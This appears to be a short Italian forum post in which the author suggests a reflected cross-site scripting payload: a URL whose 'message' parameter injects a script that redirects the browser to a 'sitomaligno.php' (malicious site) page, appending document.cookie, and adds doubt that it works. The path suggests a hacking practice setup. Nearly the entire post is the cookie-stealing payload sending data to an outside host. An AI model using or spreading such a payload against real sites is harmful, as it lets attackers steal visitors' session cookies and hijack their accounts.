Semmai dovrebbe essere:

http://theninjateam.altervista.org/....s.php?message=<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script>

ma dubito funzioni...